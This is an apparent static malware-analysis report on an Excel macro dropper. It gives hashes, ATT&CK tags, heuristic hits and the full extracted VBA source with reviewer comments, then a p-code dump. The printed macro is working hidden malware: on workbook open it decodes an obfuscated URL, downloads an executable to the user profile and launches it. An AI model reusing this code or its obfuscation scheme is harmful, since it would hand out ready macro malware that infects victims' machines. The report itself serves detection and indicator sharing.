Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 13f8ee3611b21491…

MALICIOUS

Office (OLE)

96.5 KB Created: 2020-07-19 20:42:23 Authoring application: Microsoft Excel First seen: 2020-09-07
MD5: 708e5b0d67f6379d279bf2b060653bda SHA-1: 7dd2e087f84fdc2a9675f0e461ef21f51d527f7a SHA-256: 13f8ee3611b21491b9c150d348724cc9f3eb60e7a965be057e22ae0165a6dffd
284 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1105 Ingress Tool Transfer

This Excel document contains VBA macros that run on open. The workbook's own code module (renamed "HpJMbook") defines Workbook_Open, which calls the dropper routine directly; it also defines an Auto_Open whose body is inert in the extracted source (it assigns one undeclared variable to another and calls a "Run" that no extracted module defines). Both operational strings are obfuscated with the script's Decrypt routine (reverse the string, then subtract one from every character code), so the literals quoted by the heuristics are not the real indicators: "fyf/k2JX…0;tquui" decodes to hxxps://protestlabsmovings[.]es/HjkdiP/Q6ERwnrCLqWI1j.exe (defanged) and "fyf/uuoo" decodes to "nntt.exe". The macro calls urlmon!URLDownloadToFileA (declared under the alias kgUpfVkuddPCezM) to fetch the payload to %UserProfile%\nntt.exe, ignores the return value, and then calls shell32!ShellExecuteA (alias LcDCSIL) with the "open" verb to execute it in the user's context. The second stage itself was not captured by this static pass (the only extracted artifact is the macro source), so the domain and the drop path are the actionable indicators. The aliased API declares, the string obfuscation, the dead-code call chains padding the module, and the macro-enable lure in the document body together strongly indicate a malicious dropper.

Heuristics 9

  • ClamAV: Xls.Dropper.Agent-9207294-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Agent-9207294-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    Private Declare PtrSafe Function kgUpfVkuddPCezM Lib "urlmon" Alias _
    "URLDownloadToFileA" (ByVal bIZLPpebUnkHdBHD As Long, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As String, _
    ByVal fJVVmpskIXQAilFim As String, ByVal AKgtgSuQOrYqcgFgrlD As Long, ByVal AXtRKGRjxS As Long) As Long
  • Workbook_Open macro low OLE_VBA_WBOPEN
    Workbook_Open macro
    Matched line in script
    Sub Workbook_Open()
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub Auto_Open()
    descifrar = UserProfile
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    TqZlrnyPQmoxUTqZlrnyPQmoxU = Decrypt("fyf/uuoo")
    BfvciBJyeZZBfvciBJyeZZ = Environ$("UserProfile") & "\" & TqZlrnyPQmoxUTqZlrnyPQmoxU
  • Reference to ShellExecute API high SC_STR_SHELLEXEC
    Reference to ShellExecute API
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10765 bytes
SHA-256: 0ca5557eb35d5b343c5ac4d7b08743837726a4ebbf4951976e9183a2112e38e6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
' Empty placeholder procedure: nothing calls it and it does nothing. (The p-code
' dump further down lists this module's single procedure under a different
' name, "timeGetTime" — see the note there.)
Sub Fvil()

End Sub

Attribute VB_Name = "HpJMbook"
' NOTE(review): the VB_Base GUID 00020819-… is presumably Excel's Workbook class
' ID (the three sheet modules below carry 00020820-… instead), which would make
' this the ThisWorkbook module under a renamed VB_Name — and would explain why
' its Workbook_Open handler is the auto-exec entry point. Confirm against the
' PROJECT stream.
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Decoy imports: four differently-named winmm.dll entry points (etTime,
' timeGetTime, imeGetTime here and meGetTime below; three of them truncations
' of timeGetTime). No procedure in the extracted source calls any of them.
' NOTE(review): the first two lack PtrSafe. 64-bit Office rejects Declare
' statements without PtrSafe, so if that holds this module would fail to
' compile there and the dropper would only work under 32-bit Office — worth
' confirming by detonation before assuming it runs on every host.
Private Declare Function etTime Lib "winmm.dll" () As Long


Private Declare Function timeGetTime Lib "winmm.dll" () As Long

Private Declare PtrSafe Function imeGetTime Lib "winmm.dll" () As Long

' shell32!ShellExecuteA behind the alias LcDCSIL. Used once, in
' XdOHOtTFUYcTsVAkgUpfV, to run the downloaded file with the "open" verb.
Private Declare PtrSafe Function LcDCSIL Lib "shell32.dll" Alias _
"ShellExecuteA" (ByVal GPojLNuOTcR As Long, ByVal xGG As String, _
ByVal FKhovZnmC As String, ByVal FIAYohQzBVyDQNwJjjKSgH As String, ByVal bGfwWwHBTDZJUbW As String, ByVal izNVWhEzdeKRksiNIJHMyE As Long) As Long

' urlmon!URLDownloadToFileA behind the alias kgUpfVkuddPCezM. Used once, in
' XdOHOtTFUYcTsVAkgUpfV; the call site passes (0, url, localPath, 0, 0), which
' matches the Win32 prototype order (pCaller, szURL, szFileName, dwReserved,
' lpfnCB).
Private Declare PtrSafe Function kgUpfVkuddPCezM Lib "urlmon" Alias _
"URLDownloadToFileA" (ByVal bIZLPpebUnkHdBHD As Long, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As String, _
ByVal fJVVmpskIXQAilFim As String, ByVal AKgtgSuQOrYqcgFgrlD As Long, ByVal AXtRKGRjxS As Long) As Long

' Fourth decoy winmm.dll import; never called.
Private Declare PtrSafe Function meGetTime Lib "winmm.dll" () As Long

' Dropper body: decode two obfuscated strings, fetch the payload, run it.
' Both literals go through Decrypt() below (StrReverse, then Chr(Asc(c) - 1)
' per character). Decoded values:
'   "fyf/uuoo"                   -> "nntt.exe"
'   "fyf/k2JX…sq00;tquui" (55 ch) -> hxxps://protestlabsmovings[.]es/HjkdiP/Q6ERwnrCLqWI1j.exe  (defanged)
' Only three of the six declared locals are used; the other three are padding.
' Left byte-identical to the extraction (artifact SHA-256 above) — comments only.
Sub XdOHOtTFUYcTsVAkgUpfV()
Dim TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW As String
Dim TqZlrnyPQmoxUTqZlrnyPQmoxU As String
Dim BfvciBJyeZZBfvciBJyeZZ As String
Dim kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd As String
Dim BHDPShCENXBHDPShCENX As String
Dim RvLeyRLBhRvLeyRLBh As String
' Drop filename ("nntt.exe") and full drop path: %UserProfile%\nntt.exe.
TqZlrnyPQmoxUTqZlrnyPQmoxU = Decrypt("fyf/uuoo")
BfvciBJyeZZBfvciBJyeZZ = Environ$("UserProfile") & "\" & TqZlrnyPQmoxUTqZlrnyPQmoxU


' Payload URL (decoded value in the header comment).
TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW = Decrypt("fyf/k2JXrMDsoxSF7R0QjelkI0tf/thojwpntcbmutfupsq00;tquui")

' URLDownloadToFileA(0, url, path, 0, 0). The return value is discarded, so a
' failed download still falls through to the ShellExecute call below.
kgUpfVkuddPCezM 0, TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW, BfvciBJyeZZBfvciBJyeZZ, 0, 0
' ShellExecuteA(0, "open", path, "", vbNullString, vbNormalFocus): launches the
' dropped file in the Office user's context. Nothing in this module elevates.
LcDCSIL 0, "open", BfvciBJyeZZBfvciBJyeZZ, "", vbNullString, vbNormalFocus
End Sub

' Second auto-exec name, but inert as extracted: "descifrar" and "UserProfile"
' are undeclared variants (no Option Explicit), so the assignment is a no-op,
' and "Run" is not a procedure in any extracted module. NOTE(review): if "Run"
' binds to Excel's Application.Run it is being called with no macro name, so
' either way this reaches nothing useful — the download path is Workbook_Open
' below. Confirm in a sandbox rather than from the decompiled source alone.
Sub Auto_Open()
descifrar = UserProfile
Run
End Sub

' Dead-code padding: a nine-link chain of procedures that each just call the
' next one, with cosmetically varied return types and Static modifiers to look
' like real code. Nothing calls the first link (rnIkDDisHp4e1dEwtDO8XRgW), and
' the last link calls FZ4yZFZ4yZPaWVH, which is not defined in the extracted
' source. No behaviour of interest; kept byte-identical as evidence.
Function rnIkDDisHp4e1dEwtDO8XRgW() As Currency
Call t5IOznwCrlt5IOznwCrl
End Function
Static Function t5IOznwCrlt5IOznwCrl() As Integer
Call Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4
End Function
Function Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4() As Single
Call Jb8AvPk2VRJb8AvPk2VR
End Function
Static Function Jb8AvPk2VRJb8AvPk2VR() As Date
Call TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq
End Function
Function TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq() As Variant
Call JxU0xFkI7xJxU0xFkI7x
End Function
Static Function JxU0xFkI7xJxU0xFkI7x() As Date
Call PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek
End Function
Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek() As Variant
Call EArbhx2errEArb2errEArbhx2errEArb
End Function
Static Function EArbhx2errEArb2errEArbhx2errEArb() As Double
Call DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E
End Function
Function DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E() As Single
' FZ4yZFZ4yZPaWVH is never defined in the extracted modules.
Call FZ4yZFZ4yZPaWVH
End Function

' Live auto-exec hook: Excel fires Workbook_Open on the workbook module when the
' file is opened with macros enabled, and this handler goes straight to the
' dropper routine. This — not Auto_Open — is the path that reaches the download.
Sub Workbook_Open()

XdOHOtTFUYcTsVAkgUpfV
End Sub

' String deobfuscation used for the payload URL and the drop filename.
' Algorithm: reverse the input, then shift every character down one code point
' (Chr(Asc(c) - 1)). To re-encode an IOC for hunting in other samples: add one
' to each character code, then reverse.
' The accumulator is named UserProfile, apparently so that a grep for that word
' blends in with the genuine Environ$("UserProfile") call in the dropper.
' "enc" is the implicit-ByRef parameter and is overwritten in place, which is
' harmless for the two literal-string callers in this module.
Function Decrypt(enc)
    Dim x
    Dim w
    Dim UserProfile
    Dim Wizx As Double
    enc = StrReverse(enc)
    For w = 1 To Len(enc)
        x = Mid(enc, w, 1)
        UserProfile = UserProfile & Chr(Asc(x) - 1)
    Next
    Decrypt = UserProfile
    ' Decoy loop: "en" is not declared anywhere, so Len(en) is presumably 0 and
    ' the body never runs.
    For Wizx = 4 To Len(en)
    Next
    
End Function

' Two more orphan padding procedures. Neither is called anywhere in the
' extracted source (their names are near-copies of links in the chain above),
' and both call procedures — hx2errEArb2errEArbhx2errEArb and FZ4yZFZ4yZPaWVH —
' that the extracted modules never define.
Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6() As Variant
Call hx2errEArb2errEArbhx2errEArb
End Function
Function XBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E() As Single
Call FZ4yZFZ4yZPaWVH
End Function

' Worksheet code modules for Sheet1..Sheet3. All three carry attributes only —
' no procedures, no declares — so they contribute nothing to the behaviour.
' NOTE(review): VB_Base 00020820-… is presumably Excel's Worksheet class ID
' (distinct from the 00020819-… value on the workbook module above); confirm
' against the PROJECT stream.
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

' Processing file: /tmp/qstore_qom4bcjh
' ===============================================================================
' NOTE(review): the identifier names in this p-code disassembly do not line up
' with the decompressed source above — Module1's only procedure appears here as
' "timeGetTime" rather than "Fvil", and the Declare names and Lib strings are
' shuffled (e.g. 'Lib "GPojLNuOTcR"'). The opcode sequence at lines #20-#27
' does mirror the source's decode/download/execute flow (two LitStr decodes, a
' five-argument call, then a six-argument call with "open"), which points to a
' name-table resolution artefact rather than different p-code. Even so, a
' source/p-code mismatch is the classic VBA-stomping indicator, so confirm by
' detonation or by re-running the p-code dump against the exact Office version
' before treating the decompressed source as what actually executes.
' Module streams:
' _VBA_PROJECT_CUR/VBA/Module1 - 951 bytes
' Line #0:
' 	FuncDefn (Sub timeGetTime())
' Line #1:
' Line #2:
' 	EndSub 
' _VBA_PROJECT_CUR/VBA/HpJMbook - 9607 bytes
' Line #0:
' 	FuncDefn (Private Declare Function LcDCSIL Lib "GPojLNuOTcR" () As Long)
' Line #1:
' Line #2:
' Line #3:
' 	FuncDefn (Private Declare Function xGG Lib "GPojLNuOTcR" () As Long)
' Line #4:
' Line #5:
' 	FuncDefn (Private Declare PtrSafe Function FKhovZnmC Lib "GPojLNuOTcR" () As Long)
' Line #6:
' Line #7:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function FIAYohQzBVyDQNwJjjKSgH Lib "fJVVmpskIXQAilFim" (ByVal bGfwWwHBTDZJUbW As Long, ByVal izNVWhEzdeKRksiNIJHMyE As String, ByVal shell32.dll As String, ByVal kgUpfVkuddPCezM As String, ByVal bIZLPpebUnkHdBHD As String, ByVal PShCENXRvLeyRLBhRvLeyRLBhqqpufX As Long) As Long)
' Line #8:
' Line #9:
' 	LineCont 0x0008 08 00 00 00 14 00 00 00
' 	FuncDefn (Private Declare PtrSafe Function AKgtgSuQOrYqcgFgrlD Lib "TqZlrnyPQmoxUTqZlrnyPQmoxU" (ByVal AXtRKGRjxS As Long, ByVal urlmon As String, ByVal meGetTime As String, ByVal XdOHOtTFUYcTsVAkgUpfV As Long, ByVal TeMMzzbjwXsWvMYNKEWTeMMzzbjwXsWvMYNKEW As Long) As Long)
' Line #10:
' Line #11:
' 	FuncDefn (Private Declare PtrSafe Function BfvciBJyeZZBfvciBJyeZZ Lib "GPojLNuOTcR" () As Long)
' Line #12:
' Line #13:
' 	FuncDefn (Sub kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd())
' Line #14:
' 	Dim 
' 	VarDefn BHDPShCENXBHDPShCENX (As String)
' Line #15:
' 	Dim 
' 	VarDefn RvLeyRLBhRvLeyRLBh (As String)
' Line #16:
' 	Dim 
' 	VarDefn Decrypt (As String)
' Line #17:
' 	Dim 
' 	VarDefn Environ (As String)
' Line #18:
' 	Dim 
' 	VarDefn vbNullString (As String)
' Line #19:
' 	Dim 
' 	VarDefn vbNormalFocus (As String)
' Line #20:
' 	LitStr 0x0008 "fyf/uuoo"
' 	ArgsLd Auto_Open 0x0001 
' 	St RvLeyRLBhRvLeyRLBh 
' Line #21:
' 	LitStr 0x000B "UserProfile"
' 	ArgsLd descifrar$ 0x0001 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	Ld RvLeyRLBhRvLeyRLBh 
' 	Concat 
' 	St Decrypt 
' Line #22:
' Line #23:
' Line #24:
' 	LitStr 0x0037 "fyf/k2JXrMDsoxSF7R0QjelkI0tf/thojwpntcbmutfupsq00;tquui"
' 	ArgsLd Auto_Open 0x0001 
' 	St BHDPShCENXBHDPShCENX 
' Line #25:
' Line #26:
' 	LitDI2 0x0000 
' 	Ld BHDPShCENXBHDPShCENX 
' 	Ld Decrypt 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsCall AKgtgSuQOrYqcgFgrlD 0x0005 
' Line #27:
' 	LitDI2 0x0000 
' 	LitStr 0x0004 "open"
' 	Ld Decrypt 
' 	LitStr 0x0000 ""
' 	Ld UserProfile 
' 	Ld Run 
' 	ArgsCall FIAYohQzBVyDQNwJjjKSgH 0x0006 
' Line #28:
' 	EndSub 
' Line #29:
' Line #30:
' 	FuncDefn (Sub rnIkDDisHp4e1dEwtDO8XRgW())
' Line #31:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	St t5IOznwCrlt5IOznwCrl 
' Line #32:
' 	ArgsCall Jb8AvPk2VRJb8AvPk2VR 0x0000 
' Line #33:
' 	EndSub 
' Line #34:
' Line #35:
' 	FuncDefn (Function TJW8h3uwBHyE3XYkFXIADNkqTJW8h3uwBHyE3XYkFXIADNkq(id_FFFE As Currency) As Currency)
' Line #36:
' 	ArgsCall (Call) JxU0xFkI7xJxU0xFkI7x 0x0000 
' Line #37:
' 	EndFunc 
' Line #38:
' 	FuncDefn (Static Function JxU0xFkI7xJxU0xFkI7x(id_FFFE As Integer) As Integer)
' Line #39:
' 	ArgsCall (Call) PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek 0x0000 
' Line #40:
' 	EndFunc 
' Line #41:
' 	FuncDefn (Function PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6OdVek(id_FFFE As Single) As Single)
' Line #42:
' 	ArgsCall (Call) EArbhx2errEArb2errEArbhx2errEArb 0x0000 
' Line #43:
' 	EndFunc 
' Line #44:
' 	FuncDefn (Static Function EArbhx2errEArb2errEArbhx2errEArb(id_FFFE As Date) As Date)
' Line #45:
' 	ArgsCall (Call) DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E 0x0000 
' Line #46:
' 	EndFunc 
' Line #47:
' 	FuncDefn (Function DlkYXBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E(id_FFFE As Variant) As Variant)
' Line #48:
' 	ArgsCall (Call) FZ4yZFZ4yZPaWVH 0x0000 
' Line #49:
' 	EndFunc 
' Line #50:
' 	FuncDefn (Static Function FZ4yZFZ4yZPaWVH(id_FFFE As Date) As Date)
' Line #51:
' 	ArgsCall (Call) Workbook_Open 0x0000 
' Line #52:
' 	EndFunc 
' Line #53:
' 	FuncDefn (Function Workbook_Open(id_FFFE As Variant) As Variant)
' Line #54:
' 	ArgsCall (Call) enc 0x0000 
' Line #55:
' 	EndFunc 
' Line #56:
' 	FuncDefn (Static Function enc(id_FFFE As Double) As Double)
' Line #57:
' 	ArgsCall (Call) x 0x0000 
' Line #58:
' 	EndFunc 
' Line #59:
' 	FuncDefn (Function x(id_FFFE As Single) As Single)
' Line #60:
' 	ArgsCall (Call) w 0x0000 
' Line #61:
' 	EndFunc 
' Line #62:
' Line #63:
' 	FuncDefn (Sub Wizx())
' Line #64:
' Line #65:
' 	ArgsCall kuddPCezMbIZLPpebUnkHdkuddPCezMbIZLPpebUnkHd 0x0000 
' Line #66:
' 	EndSub 
' Line #67:
' Line #68:
' 	FuncDefn (Function Auto_Open(StrReverse, id_FFFE As Variant))
' Line #69:
' 	Dim 
' 	VarDefn Chr
' Line #70:
' 	Dim 
' 	VarDefn Asc
' Line #71:
' 	Dim 
' 	VarDefn Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4
' Line #72:
' 	Dim 
' 	VarDefn en (As Double)
' Line #73:
' 	Ld StrReverse 
' 	ArgsLd PUM9xS2rvCsRX6OdVekrzGwrPUM9xS2rvCsRX6 0x0001 
' 	St StrReverse 
' Line #74:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld StrReverse 
' 	FnLen 
' 	For 
' Line #75:
' 	Ld StrReverse 
' 	Ld Asc 
' 	LitDI2 0x0001 
' 	ArgsLd Mid 0x0003 
' 	St Chr 
' Line #76:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	Ld Chr 
' 	ArgsLd XBK4r3WCbBQoVfs4z78EDlkYXBK4r3WCbBQoVfs4z78E 0x0001 
' 	LitDI2 0x0001 
' 	Sub 
' 	ArgsLd hx2errEArb2errEArbhx2errEArb 0x0001 
' 	Concat 
' 	St Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' Line #77:
' 	StartForVariable 
' 	Next 
' Line #78:
' 	Ld Dp62rz6kt90kDRkudpcs1fW4Dp62rz6kt90kDRkudpcs1fW4 
' 	St Auto_Open 
' Line #79:
' 	StartForVariable 
' 	Ld en 
' 	EndForVariable 
' 	LitDI2 0x0004 
' 	Ld Sheet1 
' 	FnLen 
' 	For 
' Line #80:
' 	StartForVariable 
' 	Next 
' Line #81:
' Line #82:
' 	EndFunc 
' Line #83:
' Line #84:
' 	FuncDefn (Function Sheet2(id_FFFE As Variant) As Variant)
' Line #85:
' 	ArgsCall (Call) Sheet3 0x0000 
' Line #86:
' 	EndFunc 
' Line #87:
' 	FuncDefn (Function Workbook(id_FFFE As Single) As Single)
' Line #88:
' 	ArgsCall (Call) w 0x0000 
' Line #89:
' 	EndFunc 
' _VBA_PROJECT_CUR/VBA/Sheet1 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet2 - 985 bytes
' _VBA_PROJECT_CUR/VBA/Sheet3 - 985 bytes